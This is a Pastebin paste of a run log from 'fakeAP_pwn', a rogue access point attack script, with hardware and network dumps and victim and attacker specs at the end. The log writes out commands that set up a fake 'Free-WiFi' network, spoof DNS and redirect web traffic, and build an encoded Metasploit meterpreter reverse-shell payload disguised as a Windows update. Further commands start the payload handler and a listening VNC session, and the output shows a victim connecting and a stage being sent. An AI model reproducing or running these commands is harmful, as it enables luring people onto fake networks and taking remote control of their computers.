API tools faq
paste
Advertisement
Guest User

EatME - fakeAP_pwn.log

a guest
Sep 16th, 2010
146
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 23.08 KB | None | 0 0
raw download clone embed print report
  1. fakeAP_pwn v0.3 (#101)
  2. Thu Sep 16 10:46:40 EDT 2010
  3. fakeAP_pwn.sh
  4. ------------------------------------------------------------------------------------------
  5.  
  6. ---
  7. [>] Testing: Environment
  8. -
  9.  
  10. Settings----------------------------------------------------------------------------------
  11.  
  12. --
  13.         interface=eth0
  14.     wifiInterface=wlan0
  15.  monitorInterface=mon0
  16.       apInterface=at0
  17.             ESSID=Free-WiFi
  18.           channel=6
  19.            apType=airbase-ng
  20.              mode=transparent
  21.           payload=vnc
  22.      backdoorPath=/root/backdoor.exe
  23.               www=/var/www/fakeAP_pwn
  24.               mtu=1500
  25.       respond2All=false
  26.         fakeAPmac=set
  27.        macAddress=00:05:7c:9a:58:3f
  28.            extras=false
  29.             debug=false
  30.       diagnostics=true
  31.           verbose=0
  32.         gatewayIP=192.168.1.1
  33.             ourIP=192.168.1.122
  34.              port=43230
  35. -
  36.  
  37. Environment-------------------------------------------------------------------------------
  38.  
  39. --
  40. ------------------------------------------------------------------------------------------
  41.  
  42. ---
  43. [+] Detecting: Kernal
  44. Linux eXe 2.6.30.9 #1 SMP Tue Dec 1 21:51:08 EST 2009 i686 GNU/Linux
  45. ------------------------------------------------------------------------------------------
  46.  
  47. ---
  48. [+] Detecting: Hardware
  49. 00:00.0 Host bridge [0600]: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX Host bridge
  50.  
  51. [8086:7190] (rev 01)
  52.     Kernel driver in use: agpgart-intel
  53.     Kernel modules: intel-agp
  54. 00:01.0 PCI bridge [0604]: Intel Corporation 440BX/ZX/DX - 82443BX/ZX/DX AGP bridge
  55.  
  56. [8086:7191] (rev 01)
  57.     Kernel modules: shpchp
  58. 00:07.0 ISA bridge [0601]: Intel Corporation 82371AB/EB/MB PIIX4 ISA [8086:7110] (rev 08)
  59. 00:07.1 IDE interface [0101]: Intel Corporation 82371AB/EB/MB PIIX4 IDE [8086:7111] (rev
  60.  
  61. 01)
  62.     Kernel driver in use: PIIX_IDE
  63. 00:07.3 Bridge [0680]: Intel Corporation 82371AB/EB/MB PIIX4 ACPI [8086:7113] (rev 08)
  64.     Kernel modules: i2c-piix4
  65. 00:07.7 System peripheral [0880]: VMware Virtual Machine Communication Interface
  66.  
  67. [15ad:0740] (rev 10)
  68.     Kernel driver in use: vmci
  69.     Kernel modules: vmci
  70. 00:0f.0 VGA compatible controller [0300]: VMware SVGA II Adapter [15ad:0405]
  71. 00:10.0 SCSI storage controller [0100]: LSI Logic / Symbios Logic 53c1030 PCI-X Fusion-MPT
  72.  
  73. Dual Ultra320 SCSI [1000:0030] (rev 01)
  74.     Kernel driver in use: mptspi
  75. 00:11.0 PCI bridge [0604]: VMware PCI bridge [15ad:0790] (rev 02)
  76. 00:15.0 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  77.     Kernel driver in use: pcieport-driver
  78.     Kernel modules: shpchp
  79. 00:15.1 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  80.     Kernel driver in use: pcieport-driver
  81.     Kernel modules: shpchp
  82. 00:15.2 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  83.     Kernel driver in use: pcieport-driver
  84.     Kernel modules: shpchp
  85. 00:15.3 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  86.     Kernel driver in use: pcieport-driver
  87.     Kernel modules: shpchp
  88. 00:15.4 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  89.     Kernel driver in use: pcieport-driver
  90.     Kernel modules: shpchp
  91. 00:15.5 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  92.     Kernel driver in use: pcieport-driver
  93.     Kernel modules: shpchp
  94. 00:15.6 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  95.     Kernel driver in use: pcieport-driver
  96.     Kernel modules: shpchp
  97. 00:15.7 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  98.     Kernel driver in use: pcieport-driver
  99.     Kernel modules: shpchp
  100. 00:16.0 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  101.     Kernel driver in use: pcieport-driver
  102.     Kernel modules: shpchp
  103. 00:16.1 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  104.     Kernel driver in use: pcieport-driver
  105.     Kernel modules: shpchp
  106. 00:16.2 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  107.     Kernel driver in use: pcieport-driver
  108.     Kernel modules: shpchp
  109. 00:16.3 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  110.     Kernel driver in use: pcieport-driver
  111.     Kernel modules: shpchp
  112. 00:16.4 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  113.     Kernel driver in use: pcieport-driver
  114.     Kernel modules: shpchp
  115. 00:16.5 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  116.     Kernel driver in use: pcieport-driver
  117.     Kernel modules: shpchp
  118. 00:16.6 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  119.     Kernel driver in use: pcieport-driver
  120.     Kernel modules: shpchp
  121. 00:16.7 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  122.     Kernel driver in use: pcieport-driver
  123.     Kernel modules: shpchp
  124. 00:17.0 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  125.     Kernel driver in use: pcieport-driver
  126.     Kernel modules: shpchp
  127. 00:17.1 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  128.     Kernel driver in use: pcieport-driver
  129.     Kernel modules: shpchp
  130. 00:17.2 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  131.     Kernel driver in use: pcieport-driver
  132.     Kernel modules: shpchp
  133. 00:17.3 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  134.     Kernel driver in use: pcieport-driver
  135.     Kernel modules: shpchp
  136. 00:17.4 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  137.     Kernel driver in use: pcieport-driver
  138.     Kernel modules: shpchp
  139. 00:17.5 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  140.     Kernel driver in use: pcieport-driver
  141.     Kernel modules: shpchp
  142. 00:17.6 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  143.     Kernel driver in use: pcieport-driver
  144.     Kernel modules: shpchp
  145. 00:17.7 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  146.     Kernel driver in use: pcieport-driver
  147.     Kernel modules: shpchp
  148. 00:18.0 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  149.     Kernel driver in use: pcieport-driver
  150.     Kernel modules: shpchp
  151. 00:18.1 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  152.     Kernel driver in use: pcieport-driver
  153.     Kernel modules: shpchp
  154. 00:18.2 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  155.     Kernel driver in use: pcieport-driver
  156.     Kernel modules: shpchp
  157. 00:18.3 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  158.     Kernel driver in use: pcieport-driver
  159.     Kernel modules: shpchp
  160. 00:18.4 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  161.     Kernel driver in use: pcieport-driver
  162.     Kernel modules: shpchp
  163. 00:18.5 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  164.     Kernel driver in use: pcieport-driver
  165.     Kernel modules: shpchp
  166. 00:18.6 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  167.     Kernel driver in use: pcieport-driver
  168.     Kernel modules: shpchp
  169. 00:18.7 PCI bridge [0604]: VMware PCI Express Root Port [15ad:07a0] (rev 01)
  170.     Kernel driver in use: pcieport-driver
  171.     Kernel modules: shpchp
  172. 02:00.0 USB Controller [0c03]: Intel Corporation 82371AB/EB/MB PIIX4 USB [8086:7112]
  173.     Kernel driver in use: uhci_hcd
  174. 02:01.0 Ethernet controller [0200]: Advanced Micro Devices [AMD] 79c970 [PCnet32 LANCE]
  175.  
  176. [1022:2000] (rev 10)
  177.     Kernel driver in use: pcnet32
  178.     Kernel modules: vmxnet
  179. 02:02.0 Multimedia audio controller [0401]: Ensoniq ES1371 [AudioPCI-97] [1274:1371] (rev
  180.  
  181. 02)
  182.     Kernel driver in use: ENS1371
  183.     Kernel modules: snd-ens1371
  184. 02:03.0 USB Controller [0c03]: VMware USB2 EHCI Controller [15ad:0770]
  185.     Kernel driver in use: ehci_hcd
  186. ------------------------------------------------------------------------------------------
  187.  
  188. ---
  189. [+] Testing: Network
  190. -ifconfig--------------------------------
  191. eth0      Link encap:Ethernet  HWaddr 00:0c:29:fb:7d:86  
  192.           inet addr:192.168.1.122  Bcast:192.168.1.255  Mask:255.255.255.0
  193.           inet6 addr: fe80::20c:29ff:fefb:7d86/64 Scope:Link
  194.           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
  195.           RX packets:1556 errors:0 dropped:0 overruns:0 frame:0
  196.           TX packets:774 errors:0 dropped:0 overruns:0 carrier:0
  197.           collisions:0 txqueuelen:1000
  198.           RX bytes:1055692 (1.0 MB)  TX bytes:77463 (77.4 KB)
  199.           Interrupt:19 Base address:0x2000
  200.  
  201. lo        Link encap:Local Loopback  
  202.           inet addr:127.0.0.1  Mask:255.0.0.0
  203.           inet6 addr: ::1/128 Scope:Host
  204.           UP LOOPBACK RUNNING  MTU:16436  Metric:1
  205.           RX packets:108 errors:0 dropped:0 overruns:0 frame:0
  206.           TX packets:108 errors:0 dropped:0 overruns:0 carrier:0
  207.           collisions:0 txqueuelen:0
  208.           RX bytes:8890 (8.8 KB)  TX bytes:8890 (8.8 KB)
  209.  
  210. wlan0     Link encap:Ethernet  HWaddr 00:dd:04:c9:1c:7c  
  211.           UP BROADCAST MULTICAST  MTU:1500  Metric:1
  212.           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
  213.           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
  214.           collisions:0 txqueuelen:1000
  215.           RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
  216.  
  217. wmaster0  Link encap:UNSPEC  HWaddr 00-C0-CA-23-EF-85-00-00-00-00-00-00-00-00-00-00  
  218.           UP RUNNING  MTU:0  Metric:1
  219.           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
  220.           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
  221.           collisions:0 txqueuelen:1000
  222.           RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
  223.  
  224. -ifconfig -a-----------------------------
  225. eth0      Link encap:Ethernet  HWaddr 00:0c:29:fb:7d:86  
  226.           inet addr:192.168.1.122  Bcast:192.168.1.255  Mask:255.255.255.0
  227.           inet6 addr: fe80::20c:29ff:fefb:7d86/64 Scope:Link
  228.           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
  229.           RX packets:1556 errors:0 dropped:0 overruns:0 frame:0
  230.           TX packets:774 errors:0 dropped:0 overruns:0 carrier:0
  231.           collisions:0 txqueuelen:1000
  232.           RX bytes:1055692 (1.0 MB)  TX bytes:77463 (77.4 KB)
  233.           Interrupt:19 Base address:0x2000
  234.  
  235. lo        Link encap:Local Loopback  
  236.           inet addr:127.0.0.1  Mask:255.0.0.0
  237.           inet6 addr: ::1/128 Scope:Host
  238.           UP LOOPBACK RUNNING  MTU:16436  Metric:1
  239.           RX packets:108 errors:0 dropped:0 overruns:0 frame:0
  240.           TX packets:108 errors:0 dropped:0 overruns:0 carrier:0
  241.           collisions:0 txqueuelen:0
  242.           RX bytes:8890 (8.8 KB)  TX bytes:8890 (8.8 KB)
  243.  
  244. wlan0     Link encap:Ethernet  HWaddr 00:dd:04:c9:1c:7c  
  245.           UP BROADCAST MULTICAST  MTU:1500  Metric:1
  246.           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
  247.           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
  248.           collisions:0 txqueuelen:1000
  249.           RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
  250.  
  251. wmaster0  Link encap:UNSPEC  HWaddr 00-C0-CA-23-EF-85-00-00-00-00-00-00-00-00-00-00  
  252.           UP RUNNING  MTU:0  Metric:1
  253.           RX packets:0 errors:0 dropped:0 overruns:0 frame:0
  254.           TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
  255.           collisions:0 txqueuelen:1000
  256.           RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
  257.  
  258. -Ping------------------------------------
  259. Ping~ping -I eth0 -c 4 192.168.1.122
  260. PING 192.168.1.122 (192.168.1.122) from 192.168.1.122 eth0: 56(84) bytes of data.
  261. 64 bytes from 192.168.1.122: icmp_seq=1 ttl=64 time=0.087 ms
  262. 64 bytes from 192.168.1.122: icmp_seq=2 ttl=64 time=0.075 ms
  263. 64 bytes from 192.168.1.122: icmp_seq=3 ttl=64 time=0.081 ms
  264. 64 bytes from 192.168.1.122: icmp_seq=4 ttl=64 time=0.078 ms
  265.  
  266. --- 192.168.1.122 ping statistics ---
  267. 4 packets transmitted, 4 received, 0% packet loss, time 2998ms
  268. rtt min/avg/max/mdev = 0.075/0.080/0.087/0.007 ms
  269. Ping~ping -I eth0 -c 4 192.168.1.1
  270. PING 192.168.1.1 (192.168.1.1) from 192.168.1.122 eth0: 56(84) bytes of data.
  271. 64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=1.77 ms
  272. 64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=2.06 ms
  273. 64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=1.70 ms
  274. 64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=1.69 ms
  275.  
  276. --- 192.168.1.1 ping statistics ---
  277. 4 packets transmitted, 4 received, 0% packet loss, time 3006ms
  278. rtt min/avg/max/mdev = 1.697/1.809/2.060/0.150 ms
  279. ------------------------------------------------------------------------------------------
  280.  
  281. ---
  282. [+] Testing: Internet connection
  283. --> Internet access: Okay
  284. Resetting interface~ifconfig eth0 up && sleep 1
  285. ------------------------------------------------------------------------------------------
  286.  
  287. ---
  288. [>] Stopping: Programs
  289. Killing 'Programs'~killall dhcpd3 apache2 wicd-client airbase-ng hostapd xterm
  290. ------------------------------------------------------------------------------------------
  291.  
  292. ---
  293. [>] Stopping: Daemons
  294. Killing 'dhcp3 service'~/etc/init.d/dhcp3-server stop
  295. Stopping DHCP server: dhcpd3 failed!
  296. Killing 'apache2 service'~/etc/init.d/apache2 stop
  297. Stopping web server: apache2.
  298. Killing 'wicd service'~/etc/init.d/wicd stop
  299. Stopping Network connection manager: wicd.
  300. ------------------------------------------------------------------------------------------
  301.  
  302. ---
  303. [>] Configuring: Wireless card
  304. Refreshing wlan0~ifconfig wlan0 down && sleep 1 && ifconfig wlan0 up
  305. Monitor Mode (Starting)~airmon-ng start wlan0
  306.  
  307.  
  308. Found 1 processes that could cause trouble.
  309. If airodump-ng, aireplay-ng or airtun-ng stops working after
  310. a short period of time, you may want to kill (some of) them!
  311.  
  312. PID    Name
  313. 6248    dhclient
  314.  
  315.  
  316. Interface    Chipset        Driver
  317.  
  318. wlan0        RTL8187     rtl8187 - [phy0]
  319.                 (monitor mode enabled on mon0)
  320.  
  321. ------------------------------------------------------------------------------------------
  322.  
  323. ---
  324. [>] Configuring: MAC address
  325. Changing MAC Address of FakeAP~ifconfig mon0 down && macchanger -m 00:05:7c:9a:58:3f mon0
  326.  
  327. && ifconfig mon0 up
  328. ------------------------------------------------------------------------------------------
  329.  
  330. ---
  331. [>] Creating: Scripts
  332. ------------------------------------------------------------------------------------------
  333.  
  334. ---
  335. [>] Creating: Exploit (Windows)
  336. Metasploit (Windows)~/opt/metasploit3/bin/msfpayload windows/meterpreter/reverse_tcp
  337.  
  338. LHOST=10.0.0.1 LPORT=4564 R | /opt/metasploit3/bin/msfencode -x
  339.  
  340. /var/www/fakeAP_pwn/sbd.exe -t exe -e x86/shikata_ga_nai -c 10 -o
  341.  
  342. /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe
  343. ------------------------------------------------------------------------------------------
  344.  
  345. ---
  346. [>] Starting: Access point
  347. Access Point~airbase-ng -a 00:05:7c:9a:58:3f -W 0 -c 6 -e "Free-WiFi" mon0
  348. 10:47:18  Created tap interface at0
  349. 10:47:18  Trying to set MTU on at0 to 1500
  350. 10:47:18  Trying to set MTU on mon0 to 1800
  351. 10:47:19  Access Point with BSSID 00:05:7C:9A:58:3F started.
  352. ------------------------------------------------------------------------------------------
  353.  
  354. ---
  355. [>] Configuring: Environment
  356. iptables~
  357.          iptables -F ;
  358.          iptables -X
  359. -iptables------------------------------------
  360. Chain INPUT (policy ACCEPT)
  361. target     prot opt source               destination        
  362.  
  363. Chain FORWARD (policy ACCEPT)
  364. target     prot opt source               destination        
  365.  
  366. Chain OUTPUT (policy ACCEPT)
  367. target     prot opt source               destination        
  368. -iptables (nat)--------------------------
  369. Chain PREROUTING (policy ACCEPT)
  370. target     prot opt source               destination        
  371.  
  372. Chain POSTROUTING (policy ACCEPT)
  373. target     prot opt source               destination        
  374.  
  375. Chain OUTPUT (policy ACCEPT)
  376. target     prot opt source               destination        
  377. iptables~
  378.          iptables --table nat --append PREROUTING --in-interface at0 -p tcp --
  379.  
  380. destination-port 80  --jump DNAT --to 10.0.0.1:80 ;
  381.          iptables --table nat --append PREROUTING --in-interface at0 -p tcp --
  382.  
  383. destination-port 443 --jump DNAT --to 10.0.0.1:80 ;
  384.          iptables --table nat --append PREROUTING --in-interface  -p tcp -j REDIRECT
  385. -iptables------------------------------------
  386. Chain INPUT (policy ACCEPT)
  387. target     prot opt source               destination        
  388.  
  389. Chain FORWARD (policy ACCEPT)
  390. target     prot opt source               destination        
  391.  
  392. Chain OUTPUT (policy ACCEPT)
  393. target     prot opt source               destination        
  394. -iptables (nat)--------------------------
  395. Chain PREROUTING (policy ACCEPT)
  396. target     prot opt source               destination        
  397. DNAT       tcp  --  anywhere             anywhere            tcp dpt:www to:10.0.0.1:80
  398. DNAT       tcp  --  anywhere             anywhere            tcp dpt:https to:10.0.0.1:80
  399.  
  400. Chain POSTROUTING (policy ACCEPT)
  401. target     prot opt source               destination        
  402.  
  403. Chain OUTPUT (policy ACCEPT)
  404. target     prot opt source               destination        
  405. ------------------------------------------------------------------------------------------
  406.  
  407. ---
  408. [>] Configuring: Permissions
  409. DHCP~chmod 775 /var/run/
  410. DHCP~touch /var/lib/dhcp3/dhcpd.leases
  411. ------------------------------------------------------------------------------------------
  412.  
  413. ---
  414. [>] Starting: DHCP
  415. DHCP~dhcpd3 -d -f -cf /tmp/fakeAP_pwn.dhcp at0
  416. ------------------------------------------------------------------------------------------
  417.  
  418. ---
  419. [>] Starting: DNS
  420. DNS~dnsspoof -i at0 -f /tmp/fakeAP_pwn.dns
  421. ------------------------------------------------------------------------------------------
  422.  
  423. ---
  424. [>] Starting: Metasploit
  425. Metasploit (Windows)~/opt/metasploit3/bin/msfcli exploit/multi/handler
  426.  
  427. PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4564
  428.  
  429. AutoRunScript=/tmp/fakeAP_pwn.rb INTERFACE=at0 E
  430. ------------------------------------------------------------------------------------------
  431.  
  432. ---
  433. [>] Starting: Web server
  434. Web Sever~/etc/init.d/apache2 start && ls /etc/apache2/sites-available/ | xargs a2dissite
  435.  
  436. && a2ensite fakeAP_pwn && a2enmod ssl && a2enmod php5 && /etc/init.d/apache2 reload
  437. Reloading web server config: apache2.
  438. ------------------------------------------------------------------------------------------
  439.  
  440. ---
  441. [+] Testing: Web server
  442. -->Web server: Okay
  443. ------------------------------------------------------------------------------------------
  444.  
  445. ---
  446. [>] Configuring: VNC
  447. VNC~vncviewer -listen -compresslevel 4 -quality 4
  448. ------------------------------------------------------------------------------------------
  449.  
  450. ---
  451. [>] Monitoring connections
  452. Connections~watch -d -n 1 "arp -n -v -i at0"
  453. ------------------------------------------------------------------------------------------
  454.  
  455. ---
  456. [i] Waiting for the target to run the "update" file
  457. [*] Starting the payload handler...
  458. [*] Started reverse handler on port 4564
  459. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  460. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  461. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  462. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  463. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  464. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  465. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  466. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  467. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  468. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  469. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  470. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  471. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  472. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  473. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  474. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  475. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  476. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  477. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  478. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  479. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  480. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  481. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  482. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  483. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  484. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  485. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  486. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  487. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  488. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  489. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  490. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  491. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  492. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  493. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  494. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  495. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  496. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  497. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  498. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  499. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  500. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  501. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  502. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  503. 10:48:18  Client Victim MAC associated (unencrypted) to ESSID: "Free-WiFi"
  504. [*] Sending stage (723456 bytes)
  505. Killing xterm~killall xterm
  506. ------------------------------------------------------------------------------------------
  507.  
  508. ---
  509. [i] *** BREAK ***
  510. ------------------------------------------------------------------------------------------
  511.  
  512. ---
  513. [>] Cleaning up
  514. Removing temp files~rm -rfv  /tmp/fakeAP_pwn.rb /tmp/fakeAP_pwn.dhcp /tmp/fakeAP_pwn.dns
  515.  
  516. /var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe
  517. removed `/tmp/fakeAP_pwn.rb'
  518. removed `/tmp/fakeAP_pwn.dhcp'
  519. removed `/tmp/fakeAP_pwn.dns'
  520. removed `/var/www/fakeAP_pwn/Windows-KB183905-x86-ENU.exe'
  521. Restoring apache~ls /etc/apache2/sites-available/ | xargs a2dissite fakeAP_pwn && a2ensite
  522.  
  523. default* && a2dismod ssl && /etc/init.d/apache2 stop
  524. Stopping web server: apache2 ... waiting .
  525. Restoring apache~rm /etc/apache2/sites-available/fakeAP_pwn
  526. Monitor Mode (Stopping)~airmon-ng stop mon0
  527.  
  528.  
  529. Interface    Chipset        Driver
  530.  
  531. wlan0        RTL8187     rtl8187 - [phy0]
  532. mon0        RTL8187     rtl8187 - [phy0] (removed)
  533.  
  534. ----------------------------
  535.  
  536. Victim Specs:
  537. Win7 64-bit Ultimate
  538. Realtek RTL8191SE Wireless LAN 802.11n PCI-E NIC | WiFi card
  539. firewall is ON
  540.  
  541. Victim Specs 2:
  542. Window XP sp2
  543. Alfa AWUSO36NH 2000mW - 2dBi
  544.  
  545. Attacker Specs:
  546. Vmware 7.x - Backtrack 4-Final
  547. AWUSO36H 500mW - 5dBi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!